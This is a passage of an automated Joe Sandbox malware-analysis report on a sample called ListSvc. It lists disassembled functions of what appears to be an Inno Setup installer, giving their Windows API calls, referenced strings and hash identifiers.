Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
Opcode Fuzzy Hash: db782202178d27a3b7ec1b4d3af323313e6a5951352ddb141a95d71b7c8baf5b
Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B

Uniqueness

Uniqueness Score: -1.00%

Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 006A6913
GetWindowLongW.USER32(?,000000F0), ref: 006A6930
GetWindowLongW.USER32(?,000000EC), ref: 006A6955

Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29

GetActiveWindow.USER32 ref: 006A6A34
SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87

Strings

`, xrefs: 006A68E9

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Window$ActiveLong$EnableIconic
String ID: `
API String ID: 4222481217-2679148245
Opcode ID: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
Opcode Fuzzy Hash: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE

Strings

isRS-, xrefs: 006B8E55
isRS-???.tmp, xrefs: 006B8E1D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
Opcode Fuzzy Hash: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 005C90F9
GetWindowLongW.USER32(?,000000F0), ref: 005C9116
GetWindowLongW.USER32(?,000000EC), ref: 005C913B
GetActiveWindow.USER32 ref: 005C9149
MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Window$ActiveLong$IconicMessage
String ID:
API String ID: 1633107849-0
Opcode ID: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
Opcode Fuzzy Hash: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CreateInstanceVersion
String ID:
API String ID: 1462612201-0
Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15

Uniqueness

Uniqueness Score: -1.00%

Function 005C8B3C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C8B49
SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C8B59

Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B91D7,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000), ref: 00413EA6

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: DescriptorSecurity$CreateDaclInitializeMutex
String ID:
API String ID: 3525989157-0
Opcode ID: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
Opcode Fuzzy Hash: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A

Uniqueness

Uniqueness Score: -1.00%

Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
MsgWaitForMultipleObjects.USER32 ref: 006B9206
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B

Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5

Strings

/REG, xrefs: 006B916E
(\m, xrefs: 006B928F
<`m, xrefs: 006B927E
.msg, xrefs: 006B923E
.lst, xrefs: 006B9258
Inno-Setup-RegSvr-Mutex, xrefs: 006B91C9
/REGU, xrefs: 006B9192
Setup, xrefs: 006B91AA

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ShowWindow$FileModuleMultipleNameObjectsWait
String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 66301061-906243933
Opcode ID: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
Opcode Fuzzy Hash: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00625D4B
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
GetExitCodeProcess.KERNEL32 ref: 00625D86
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9

Strings

Helper process exited., xrefs: 00625D95
Helper process exited, but failed to get exit code., xrefs: 00625DBF
Helper process exited with failure code: 0x%x, xrefs: 00625DB3
Helper isn't responding; killing it., xrefs: 00625D57
Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
Opcode Fuzzy Hash: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A

Uniqueness

Uniqueness Score: -1.00%

Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
SetWindowLongW.USER32 ref: 006B74F0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
MsgWaitForMultipleObjects.USER32 ref: 006B7599
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7

Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996

DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD

Strings

(\m, xrefs: 006B7498
STATIC, xrefs: 006B74D6
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 006B7554

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 1779715363-1630723103
Opcode ID: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
Opcode Fuzzy Hash: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64

Uniqueness

Uniqueness Score: -1.00%

Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
MsgWaitForMultipleObjects.USER32 ref: 006260D7
GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

CreateEvent, xrefs: 0062602F
TransactNamedPipe, xrefs: 00626097

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
Opcode Fuzzy Hash: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079

Strings

en-US,en,, xrefs: 0040DFBE, 0040E065

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-US,en,
API String ID: 975949045-3579323720
Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF

Uniqueness

Uniqueness Score: -1.00%

Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E

Strings

.DEFAULT\Control Panel\International, xrefs: 005C8045
GetUserDefaultUILanguage, xrefs: 005C8011
Locale, xrefs: 005C805D
kernel32.dll, xrefs: 005C8016
Control Panel\Desktop\ResourceLocale, xrefs: 005C807D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
